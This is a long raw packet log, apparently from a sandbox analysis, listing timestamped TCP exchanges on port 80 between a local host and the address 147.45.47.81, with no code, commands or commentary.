                                                                                                                                                                                                            Nov 14, 2024 12:20:00.119859934 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120026112 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120037079 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120052099 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120136023 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120136023 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120136023 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120136023 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120136023 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120136023 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120187998 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120198965 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120201111 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120212078 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120218039 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120228052 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120238066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120249033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120249987 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120363951 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120376110 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120387077 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120397091 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120407104 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120417118 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120425940 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120498896 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120511055 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120520115 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120531082 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120541096 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120619059 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120619059 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120619059 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120619059 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120640039 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120651960 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120661974 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120671988 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120677948 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120682955 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120695114 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120695114 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120704889 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120716095 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120726109 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120729923 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120729923 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120745897 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120750904 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120759964 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120969057 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120979071 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120989084 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.120999098 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121009111 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121018887 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121028900 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121355057 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121355057 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121356010 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121356010 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121356010 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121443987 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121640921 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121651888 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121661901 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121671915 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121681929 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121691942 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121702909 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121712923 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121722937 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121733904 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121743917 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121754885 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121783018 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121793985 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.121803999 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122041941 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122054100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122064114 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122160912 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122349977 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122360945 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122370958 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122380972 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122390985 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122401953 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122412920 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122422934 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122433901 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122445107 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122446060 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122446060 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122446060 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122446060 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122446060 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122446060 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122446060 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122456074 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122468948 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122469902 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122468948 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122468948 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122468948 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122468948 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122569084 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122569084 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122662067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122675896 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122685909 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122697115 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122706890 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122718096 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122728109 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122739077 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122781992 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122781992 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122816086 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122828960 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122838974 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122848988 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122859955 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122869968 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122973919 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122984886 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.122993946 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123004913 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123014927 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123017073 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123017073 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123017073 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123017073 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123058081 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123058081 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123097897 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123265028 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123440981 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123452902 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123464108 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123475075 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123486996 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123500109 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123509884 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123521090 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123599052 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123606920 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123606920 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123615026 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123626947 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123797894 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123809099 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123815060 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123819113 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123827934 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123940945 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123969078 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.123980999 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124006033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124202967 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124223948 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124317884 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124352932 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124362946 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124373913 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124377012 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124386072 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124397039 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124407053 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124417067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124428034 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124438047 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124448061 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124459028 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124469042 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124479055 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124495029 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124505997 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124515057 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124526024 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124536037 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124547958 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124558926 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124567986 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124577999 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124588013 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124597073 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124608994 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124619961 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124771118 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124771118 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124771118 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124771118 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124771118 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124771118 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124771118 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124771118 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124785900 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124785900 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124785900 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124785900 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124792099 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124808073 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124816895 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124960899 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124974966 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.124991894 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125004053 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125207901 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125207901 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125207901 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125207901 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125459909 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125472069 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125483036 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125493050 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125503063 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125514030 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125524044 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125534058 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125545025 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125555992 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125566006 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125600100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125627995 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125641108 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125650883 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125662088 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125751019 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125761986 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125777006 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125793934 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125793934 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125793934 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125822067 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125822067 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125822067 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125822067 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125822067 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125822067 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125900984 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.125915051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.126027107 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.180782080 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.187613010 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.187741041 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.237518072 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244642019 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244658947 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244668961 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244678974 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244704962 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244771004 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244775057 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244786978 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244797945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244808912 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244820118 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244829893 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244839907 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244842052 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244849920 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244859934 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244864941 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244870901 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244880915 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244891882 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244900942 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244903088 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244914055 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244920969 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244931936 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244942904 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244952917 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244959116 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.244959116 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245090961 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245124102 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245140076 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245172024 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245299101 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245309114 CET8049958147.45.47.81192.168.2.10
